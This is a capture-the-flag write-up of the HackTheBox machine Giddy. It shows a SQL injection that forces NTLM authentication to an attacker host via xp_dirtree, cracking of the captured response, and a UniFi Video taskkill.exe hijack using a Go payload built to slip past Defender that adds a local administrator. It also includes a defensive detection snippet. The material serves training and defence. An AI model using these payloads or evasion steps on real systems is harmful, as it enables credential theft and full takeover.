SQL injection doesn’t always mean dumping a database. Sometimes it just means coaxing the server into making a network connection it shouldn’t - and that’s enough to steal credentials. Giddy is a great example of that, paired with a creative privesc that requires bypassing Windows Defender with a custom payload.

Machine Info

| Field      | Details       |
|------------|---------------|
| Name       | Giddy         |
| Platform   | HackTheBox    |
| OS         | Windows       |
| Difficulty | Medium        |
| IP         | 10.129.96.140 |

TL;DR

ASP.NET MVC app has a search endpoint vulnerable to SQL injection. We use xp_dirtree to force the SQL Server service to authenticate outbound to our Responder instance, capturing Stacy's Net-NTLMv2 response. After cracking it, Evil-WinRM gives us a shell. On the machine we find a unifivideo file in her Documents hinting at CVE-2016-6914 - Ubiquiti UniFi Video's SYSTEM service launches taskkill.exe by bare name on stop and finds it in its own writable working directory first. Defender blocks msfvenom, so we cross-compile a custom Go payload to add a local admin user and RDP in as that user to read root.txt.

Recon

nmap scan showing ports 80, 443, 3389, and 5985 open on the target

Ports 80 (HTTP), 443 (HTTPS), 3389 (RDP), and 5985 (WinRM). Standard Windows web server setup. Let’s see what’s on port 80.

Enumeration

IIS default page showing a happy dog hanging out a car window

A cheerful dog. Not exactly a clue, but the IIS server is confirmed. Time to find actual content.

gobuster directory scan finding /aspnet_client, /remote, /mvc, and /aspnet_Client paths

```shell
gobuster dir -u http://10.129.96.140/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -b 404 -t 25
```

/mvc jumps out. That’s an ASP.NET MVC application - likely more attack surface than a static page.

ASP.NET MVC application search page at /mvc/Search.aspx

There’s a product search form at /mvc/Search.aspx. Any time I see a search field backed by a database, the first thing I try is a single quote.

Foothold

SQL Injection

SQL Server error page showing unclosed quotation mark syntax error confirming SQL injection

Sending ' in the search field breaks the query immediately: “Unclosed quotation mark after the character string. Incorrect syntax near.” That’s raw SQL Server error output - verbose errors are on, and the input goes straight into the query unsanitized.

Now, instead of dumping tables, there's a more interesting trick available in SQL Server: xp_dirtree. It's an extended stored procedure that lists the contents of a directory - and it happily accepts a UNC path. Point it at \\<our-ip>\share and the SQL Server service account opens an SMB connection to us and answers our NTLM challenge; with Responder listening, we capture that Net-NTLMv2 response. Two details make this so useful. First, xp_dirtree is executable by the public role by default, so unlike xp_cmdshell it needs no sysadmin rights, which is exactly the situation a low-privileged web app login leaves us in. Second, what we capture is a challenge-response, not the account's NT hash: it can be cracked offline (or relayed where SMB signing is off), but not passed-the-hash directly. xp_fileexist and xp_subdirs behave the same way if xp_dirtree happens to be locked down.

The payload:

```sql
'; EXEC master..xp_dirtree '\\10.10.14.2\share'--
```

Responder tool starting up and listening on tun0 interface for NTLM authentication requests

```shell
sudo responder -I tun0 -v
```

Responder capturing Stacy's NTLMv2 hash after the SQL Server made an outbound SMB connection

Stacy's Net-NTLMv2 response comes right in. The SQL Server service runs under the account GIDDY\Stacy rather than a virtual service account (which would have handed us the machine account instead), and it happily authenticated to our fake share.
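From the defender's side, the whole attack is one SQL batch that names a procedure capable of opening a path and a UNC host that is not yours. The detection below is an added example written for this page, not code from the box or from any of the tools above; it assumes you are capturing batch text (for instance from an Extended Events sql_batch_completed session or the application's query log) and that the trusted file-server range is 10.0.5.0/24. The batches and that range are constructed for illustration.

```go
package main

import (
	"fmt"
	"net"
	"regexp"
	"strings"
)

// Procedures and T-SQL features that make SQL Server open a path itself. Given
// a UNC path, every one of them authenticates outbound as the service account,
// so a call naming a host you do not own is a forced-authentication attempt
// regardless of whether any rows came back.
var outboundProcs = []string{
	"xp_dirtree", "xp_fileexist", "xp_subdirs", "xp_cmdshell", "openrowset", "bulk insert",
}

// uncHost captures the server component of a \\host\share path. It accepts two
// or more leading backslashes so escaped copies in log exports still match.
var uncHost = regexp.MustCompile(`\\\\+([A-Za-z0-9._-]+)\\`)

type Finding struct {
	Proc  string
	Host  string
	Batch string
}

// trustedNets parses the CIDRs that legitimately host backup or file shares.
// The ranges passed in are an assumption for the example, not anything from the box.
func trustedNets(cidrs ...string) []*net.IPNet {
	var nets []*net.IPNet
	for _, c := range cidrs {
		_, n, err := net.ParseCIDR(c)
		if err != nil {
			panic(err)
		}
		nets = append(nets, n)
	}
	return nets
}

func trusted(host string, nets []*net.IPNet) bool {
	ip := net.ParseIP(host)
	if ip == nil {
		return false // hostnames would need resolving first; treat as untrusted here
	}
	for _, n := range nets {
		if n.Contains(ip) {
			return true
		}
	}
	return false
}

// matchProc returns the first outbound-capable procedure named in a batch, or "".
func matchProc(batch string) string {
	lower := strings.ToLower(batch)
	for _, p := range outboundProcs {
		if strings.Contains(lower, p) {
			return p
		}
	}
	return ""
}

// Inspect scans captured T-SQL batches and reports outbound-capable procedures
// pointed at UNC hosts outside the trusted ranges. xp_cmdshell is reported
// unconditionally since it has no business appearing in application traffic.
func Inspect(batches []string, nets []*net.IPNet) []Finding {
	var out []Finding
	for _, b := range batches {
		p := matchProc(b)
		if p == "" {
			continue
		}
		m := uncHost.FindStringSubmatch(b)
		switch {
		case p == "xp_cmdshell":
			out = append(out, Finding{Proc: p, Batch: b})
		case m != nil && !trusted(m[1], nets):
			out = append(out, Finding{Proc: p, Host: m[1], Batch: b})
		}
	}
	return out
}

// Constructed sample: three benign batches and the Giddy injection as a
// batch-completed capture would record it (local xp_dirtree and a trusted
// file server are deliberately included as the false positives to avoid).
var sampleBatches = []string{
	`SELECT id, name, price FROM Products WHERE name LIKE '%collar%'`,
	`EXEC master..xp_dirtree 'D:\backups', 1, 1`,
	`EXEC master..xp_fileexist '\\10.0.5.20\backups\nightly.bak'`,
	`SELECT id, name, price FROM Products WHERE name LIKE '%'; EXEC master..xp_dirtree '\\10.10.14.2\share'--%'`,
}

func main() {
	for _, f := range Inspect(sampleBatches, trustedNets("10.0.5.0/24")) {
		fmt.Printf("ALERT %s -> %s : %s\n", f.Proc, f.Host, f.Batch)
	}
}
```

Only the injected batch is reported, with the attacker host extracted; a local xp_dirtree and a call to the trusted share pass silently. Tuning the trusted ranges is the whole game here: the SQL Server service account should only ever authenticate to hosts you put on that list.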

john cracking Stacy's NTLMv2 hash with rockyou.txt, finding the password xNnWo6272k7x

```shell
john hash --wordlist=/usr/share/wordlists/rockyou.txt
```

Password: xNnWo6272k7x. WinRM is open, let’s use it.

Evil-WinRM shell as Stacy showing Documents directory with query and unifivideo files

```shell
evil-winrm -u stacy -p 'xNnWo6272k7x' -i 10.129.96.140
```

We’re in as Stacy. Looking at her Documents folder, there’s a file called unifivideo - that’s a hint at what’s installed on this machine.

Privilege Escalation

CVE-2016-6914 - Ubiquiti UniFi Video

Exploit-DB result for Ubiquiti UniFi Video 3.7.3 Local Privilege Escalation CVE-2016-6914

CVE-2016-6914 is a local privilege escalation in Ubiquiti UniFi Video 3.7.3 for Windows. The service runs as SYSTEM, and when it stops it launches taskkill.exe by bare name rather than by full path. CreateProcess then walks its search order, which puts the process's working directory - C:\ProgramData\unifi-video\ - ahead of %SystemRoot%\System32. That directory is writable by low-privileged users, so a taskkill.exe dropped there runs as SYSTEM the next time the service stops. Before relying on it, confirm two things: that your user can write to the directory (icacls will tell you) and that your user is permitted to stop the service at all. Here Stacy can do both.
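The bug comes down to where Windows looks for a bare image name before it reaches System32. The following is an added example, not code from the box, the advisory or the UniFi product: it models the default CreateProcess search order and, for a given working directory, lists the locations where planting a file wins. The directory layout and the single %PATH% entry are constructed assumptions; the advisory only names C:\ProgramData\unifi-video as the working directory, so treating it as the app directory too is an assumption made here.

```go
package main

import (
	"fmt"
	"strings"
)

// Default CreateProcess search order for an image name given without a path
// (abridged: the 16-bit System directory is omitted): the calling executable's
// directory, the process's current directory, System32, the Windows directory,
// then each %PATH% entry in order. Duplicates collapse so a directory that is
// both app dir and working dir is listed once.
func searchOrder(appDir, cwd, systemRoot string, pathEntries []string) []string {
	raw := append([]string{appDir, cwd, systemRoot + `\System32`, systemRoot}, pathEntries...)
	seen := map[string]bool{}
	var order []string
	for _, d := range raw {
		d = strings.TrimRight(d, `\`)
		key := strings.ToLower(d)
		if d == "" || seen[key] {
			continue
		}
		seen[key] = true
		order = append(order, d)
	}
	return order
}

// resolve returns the path the loader would pick for name, or "" if none exists.
func resolve(name string, order []string, exists func(string) bool) string {
	for _, dir := range order {
		if c := dir + `\` + name; exists(c) {
			return c
		}
	}
	return ""
}

// hijackPoints lists every candidate searched before the legitimate copy of
// name: each is a location where write access for a low-privileged user means
// code execution as the service account.
func hijackPoints(name string, order []string, exists func(string) bool) []string {
	var pts []string
	for _, dir := range order {
		c := dir + `\` + name
		if exists(c) {
			break
		}
		pts = append(pts, c)
	}
	return pts
}

// fsLookup models the host as the set of files that exist, case-insensitive
// like NTFS. Constructed for the example; nothing here touches a real disk.
func fsLookup(files ...string) func(string) bool {
	set := map[string]bool{}
	for _, f := range files {
		set[strings.ToLower(f)] = true
	}
	return func(p string) bool { return set[strings.ToLower(p)] }
}

const (
	serviceDir   = `C:\ProgramData\unifi-video` // working directory named by the advisory; assumed here to be the app dir too
	systemRoot   = `C:\Windows`
	realTaskkill = systemRoot + `\System32\taskkill.exe`
)

// giddyOrder is the order the service's taskkill.exe lookup walks; the single
// %PATH% entry is an assumed minimal value.
var giddyOrder = searchOrder(serviceDir, serviceDir, systemRoot, []string{systemRoot + `\System32\Wbem`})

func main() {
	clean := fsLookup(realTaskkill)
	fmt.Println("clean box resolves:", resolve("taskkill.exe", giddyOrder, clean))
	fmt.Println("plant here to win: ", hijackPoints("taskkill.exe", giddyOrder, clean))
	planted := fsLookup(realTaskkill, serviceDir+`\taskkill.exe`)
	fmt.Println("after planting:    ", resolve("taskkill.exe", giddyOrder, planted))
}
```

On the clean model the lookup lands on the real System32 binary and reports exactly one hijack point, the working directory; once a file is planted there, the same lookup resolves to it. The fix on the vendor side is the one the model makes obvious: launch helpers by full path, or set the working directory to somewhere only administrators can write.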

The obvious move is to use msfvenom for a reverse shell payload, but Windows Defender on this box blocks standard msfvenom output. Time to get creative.

Custom Go Payload

Instead of a reverse shell, we just need code execution as SYSTEM. Adding a local admin user is simpler, needs no callback to us, and a one-off Go binary matches none of Defender's static signatures:

```go
package main

import "os/exec"

// Built as taskkill.exe and dropped in the UniFi Video working directory; the
// service runs it as SYSTEM when it stops. No network callback, no shellcode,
// just the two net commands needed to create a local administrator.
func main() {
	cmd := exec.Command("cmd", "/c",
		"net user hacker P@ssw0rd123 /add && net localgroup administrators hacker /add")
	_ = cmd.Run() // nobody to report to; success is checked from the outside with nxc
}
```

Cross-compiled for Windows:

```shell
GOOS=windows GOARCH=amd64 go build -o taskkill.exe taskkill.go
```

With an SMB share of ours hosting the binary (Responder has to be stopped first, since it also binds 445; impacket's smbserver.py does the job), we copy the payload over and trigger the service restart:

```powershell
copy \\10.10.14.2\share\taskkill.exe C:\ProgramData\unifi-video\taskkill.exe
Stop-Service "Ubiquiti UniFi Video" -Force
Start-Service "Ubiquiti UniFi Video"
```

The service stops, calls taskkill.exe, finds ours in its working directory before the real one in System32, and runs it as SYSTEM. User hacker is now a local admin.

nxc RDP confirming hacker:P@ssw0rd123 credentials work on the target with Pwnd confirmation

```shell
nxc rdp 10.129.96.140 -u hacker -p 'P@ssw0rd123'
```

xfreerdp RDP session as hacker showing root.txt open in Notepad with the flag

```shell
xfreerdp3 /u:hacker /p:'P@ssw0rd123' /v:10.129.96.140 /cert:ignore
```

Root flag in Notepad. Done.

Takeaways

SQL injection doesn't need to read data to be dangerous. Forcing outbound NTLM authentication via xp_dirtree (or xp_fileexist, xp_subdirs) is a powerful technique - the attacker never touches a single table, but still walks away with a crackable Net-NTLMv2 response for the service account. Always consider which stored procedures are reachable from the application's login and which account the SQL Server service runs as.

AV bypass with custom compiled payloads. When msfvenom gets caught, think about what your payload actually needs to do. Adding a user requires a single cmd /c net user call - trivial to implement in any language. A freshly compiled one-off binary will not match Defender's static signatures, though behavioural detections (a SYSTEM process spawning net user /add, say) can still fire, so keep the payload as quiet as the objective allows.

Search order matters. The UniFi Video bug is a classic binary hijacking pattern: an executable launched by bare name is resolved through the CreateProcess search order, which checks the application and working directories before System32 and %PATH%. Services that do this from a directory low-privileged users can write to are a persistent source of local privescs. Always check what the service working directory is and who can write there.
